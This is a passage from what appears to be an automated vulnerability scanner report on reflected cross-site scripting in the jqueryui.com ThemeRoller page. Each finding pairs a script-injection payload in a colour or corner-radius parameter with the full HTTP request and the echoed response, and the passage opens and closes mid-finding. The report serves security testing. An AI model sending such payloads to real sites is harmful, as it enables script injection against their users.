Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:21 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8pxaffe9%22%3E%3Cscri
...[SNIP]...
<input type="text" value="8pxaffe9\\\"><script>alert(1)</script>0f2a8359a6f" name="cornerRadius" id="cornerRadius" class="cornerRadius" />
...[SNIP]...

1.156. http://jqueryui.com/themeroller/_rollyourown.php [cornerRadiusShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23ad0"><script>alert(1)</script>df5e393dd08 was submitted in the cornerRadiusShadow parameter. This input was echoed as 23ad0\\\"><script>alert(1)</script>df5e393dd08 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px23ad0"><script>alert(1)</script>df5e393dd08 HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:57 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" value="8px23ad0\\\"><script>alert(1)</script>df5e393dd08" name="cornerRadiusShadow" id="cornerRadiusShadow" class="cornerRadius" />
...[SNIP]...

1.157. http://jqueryui.com/themeroller/_rollyourown.php [fcActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 549cc"><script>alert(1)</script>a2548245a2c was submitted in the fcActive parameter. This input was echoed as 549cc\\\"><script>alert(1)</script>a2548245a2c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7549cc"><script>alert(1)</script>a2548245a2c&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:38 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="fcActive" id="fcActive" class="hex" value="0074c7549cc\\\"><script>alert(1)</script>a2548245a2c" size="6" />
...[SNIP]...

1.158. http://jqueryui.com/themeroller/_rollyourown.php [fcContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39623"><script>alert(1)</script>19a538c79bc was submitted in the fcContent parameter. This input was echoed as 39623\\\"><script>alert(1)</script>19a538c79bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=38383839623"><script>alert(1)</script>19a538c79bc&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:28 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="fcContent" id="fcContent" class="hex" value="38383839623\\\"><script>alert(1)</script>19a538c79bc" size="6" />
...[SNIP]...

1.159. http://jqueryui.com/themeroller/_rollyourown.php [fcDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3438"><script>alert(1)</script>5d8c48f277d was submitted in the fcDefault parameter. This input was echoed as e3438\\\"><script>alert(1)</script>5d8c48f277d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000e3438"><script>alert(1)</script>5d8c48f277d&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:31 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="fcDefault" id="fcDefault" class="hex" value="4c3000e3438\\\"><script>alert(1)</script>5d8c48f277d" size="6" />
...[SNIP]...

1.160. http://jqueryui.com/themeroller/_rollyourown.php [fcError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4eb9"><script>alert(1)</script>c5c296af40f was submitted in the fcError parameter. This input was echoed as f4eb9\\\"><script>alert(1)</script>c5c296af40f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=fffffff4eb9"><script>alert(1)</script>c5c296af40f&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:47 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="fcError" id="fcError" class="hex" value="fffffff4eb9\\\"><script>alert(1)</script>c5c296af40f" size="6" />
...[SNIP]...

1.161. http://jqueryui.com/themeroller/_rollyourown.php [fcHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 930d9"><script>alert(1)</script>3137f1e3c01 was submitted in the fcHeader parameter. This input was echoed as 930d9\\\"><script>alert(1)</script>3137f1e3c01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff930d9"><script>alert(1)</script>3137f1e3c01&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow